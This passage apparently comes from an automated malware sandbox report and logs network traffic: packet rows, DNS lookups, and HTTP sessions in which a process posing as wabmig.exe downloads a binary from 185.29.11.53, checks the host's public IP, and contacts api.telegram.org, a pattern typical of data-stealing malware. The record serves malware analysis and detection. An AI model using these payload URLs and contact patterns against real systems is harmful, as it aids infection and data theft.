                                                            Sep 25, 2024 16:01:27.328080893 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.328099966 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.328377962 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.328392029 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.328423977 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.328450918 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.329346895 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.329359055 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.329370975 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.329401016 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.329490900 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.329504967 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.329511881 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.329539061 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.329567909 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.330221891 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.330235004 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.330240965 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.330296993 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.330310106 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.330322981 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.330358028 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.330415010 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.330723047 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.330763102 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.330765963 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.330775976 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.330804110 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.330817938 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.330826044 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.330832005 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.330857992 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.330888987 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.331615925 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.331629038 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.331640005 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.331664085 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.331681013 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.331681013 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.331695080 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.331727982 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.331754923 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.332525015 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.332535982 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.332546949 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.332586050 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.332616091 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.332633972 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.332647085 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.332678080 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.332700968 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.333323002 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.333343983 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.333355904 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.333365917 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.333380938 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.333405018 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.334034920 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.334060907 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.334075928 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.334083080 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.334095955 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.334115028 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.334572077 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.334609985 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.334625006 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.334635973 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.334666967 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.334683895 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.334717035 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.334728956 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.334811926 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.335304022 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.335345030 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.335376024 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.335418940 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.335637093 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.335690022 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.335805893 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.335860968 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.335875988 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.335922003 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.336179018 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.336230040 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.336363077 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.336374998 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.336385965 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.336410999 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.336425066 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.336435080 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.336447954 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.336483002 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.336512089 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.337486029 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.337546110 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.337647915 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.337661982 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.337697983 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.337709904 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.337871075 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.337920904 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.338011980 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.338023901 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.338068962 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.338088036 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.338336945 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.338359118 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.338371038 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.338388920 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.338418961 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.338432074 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.338444948 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.338460922 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.338478088 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.338500977 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.339270115 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.339292049 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.339304924 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.339334011 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.339344025 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.339354992 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.339370012 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.339400053 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.339426994 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340198040 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340259075 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340264082 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340274096 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340317011 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340339899 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340353012 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340363979 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340372086 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340377092 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340390921 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340392113 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340434074 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340451956 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340452909 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340502024 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340687990 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340742111 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340764999 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340776920 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340821028 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340831995 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340905905 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340919018 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340929985 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340941906 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340955019 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340956926 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340967894 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340976000 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.340981007 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.340992928 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.341011047 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.341026068 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.341031075 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.341044903 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.341047049 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.341058969 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.341070890 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.341070890 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.341113091 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.341140985 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.341672897 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.341728926 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.341902018 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.341950893 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.398613930 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398644924 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398658037 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398736954 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.398758888 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.398781061 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398799896 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398813009 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398818970 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.398824930 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398837090 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398849010 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398855925 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.398859978 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398873091 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398885965 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.398885965 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398897886 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398906946 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.398911953 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398922920 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.398926973 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398937941 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398951054 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.398952007 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.399024963 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404110909 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404138088 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404150963 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404172897 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404197931 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404198885 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404210091 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404223919 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404236078 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404247046 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404278040 CEST4971080192.168.2.8185.29.11.53
                                                            Sep 25, 2024 16:01:27.404284000 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404295921 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404308081 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:27.404320002 CEST8049710185.29.11.53192.168.2.8
                                                            Sep 25, 2024 16:01:40.530216932 CEST49729443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:40.530718088 CEST49729443192.168.2.8188.114.97.3
                                                            Sep 25, 2024 16:01:40.563062906 CEST4972880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:40.787496090 CEST8049728132.226.247.73192.168.2.8
                                                            Sep 25, 2024 16:01:40.787563086 CEST4972880192.168.2.8132.226.247.73
                                                            Sep 25, 2024 16:01:40.789716005 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:40.789766073 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:40.789828062 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:40.790307045 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:40.790323019 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.563427925 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.563509941 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:41.567497969 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:41.567507982 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.567790985 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.570779085 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:41.615411997 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.825213909 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.825290918 CEST44349730149.154.167.220192.168.2.8
                                                            Sep 25, 2024 16:01:41.825366020 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:41.873963118 CEST49730443192.168.2.8149.154.167.220
                                                            Sep 25, 2024 16:01:57.212063074 CEST4971680192.168.2.8132.226.247.73
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Sep 25, 2024 16:01:27.711285114 CEST | 57631 | 53 | 192.168.2.8 | 1.1.1.1
                                                            Sep 25, 2024 16:01:27.718611002 CEST | 53 | 57631 | 1.1.1.1 | 192.168.2.8
                                                            Sep 25, 2024 16:01:29.267692089 CEST | 49174 | 53 | 192.168.2.8 | 1.1.1.1
                                                            Sep 25, 2024 16:01:29.278820992 CEST | 53 | 49174 | 1.1.1.1 | 192.168.2.8
                                                            Sep 25, 2024 16:01:40.563646078 CEST | 54603 | 53 | 192.168.2.8 | 1.1.1.1
                                                            Sep 25, 2024 16:01:40.788978100 CEST | 53 | 54603 | 1.1.1.1 | 192.168.2.8
                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                            Sep 25, 2024 16:01:27.711285114 CEST | 192.168.2.8 | 1.1.1.1 | 0xffc4 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
                                                            Sep 25, 2024 16:01:29.267692089 CEST | 192.168.2.8 | 1.1.1.1 | 0x9f1c | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
                                                            Sep 25, 2024 16:01:40.563646078 CEST | 192.168.2.8 | 1.1.1.1 | 0x6d3d | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                            Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                            Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
                                                            Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
                                                            Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
                                                            Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                                                            Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                                                            Sep 25, 2024 16:01:29.278820992 CEST | 1.1.1.1 | 192.168.2.8 | 0x9f1c | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                            Sep 25, 2024 16:01:29.278820992 CEST | 1.1.1.1 | 192.168.2.8 | 0x9f1c | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                            Sep 25, 2024 16:01:40.788978100 CEST | 1.1.1.1 | 192.168.2.8 | 0x6d3d | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                            • reallyfreegeoip.org
                                                            • api.telegram.org
                                                            • 185.29.11.53
                                                            • checkip.dyndns.org
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.8 | 49710 | 185.29.11.53 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 25, 2024 16:01:26.363347054 CEST | 171 | OUT | GET /fhSIfglR68.bin HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: 185.29.11.53
                                                            Cache-Control: no-cache
                                                            Sep 25, 2024 16:01:26.987665892 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Last-Modified: Tue, 24 Sep 2024 22:05:30 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: "6878b9decdedb1:0"
                                                            Server: Microsoft-IIS/8.5
                                                            Date: Wed, 25 Sep 2024 14:01:24 GMT
                                                            Content-Length: 274496


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 25, 2024 16:01:27.731781960 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:28.417197943 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:28 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: b2513a4bf69c17faf22f4cb5f2860e5b
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Sep 25, 2024 16:01:28.421348095 CEST | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Sep 25, 2024 16:01:28.630296946 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:28 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 650357a3cad0b1994a0ae76f0efb1a15
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Sep 25, 2024 16:01:30.134605885 CEST | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Sep 25, 2024 16:01:30.343353987 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: a8b520a92002acb76511a9f66e3652ff
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.8 | 49716 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 25, 2024 16:01:30.964415073 CEST | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
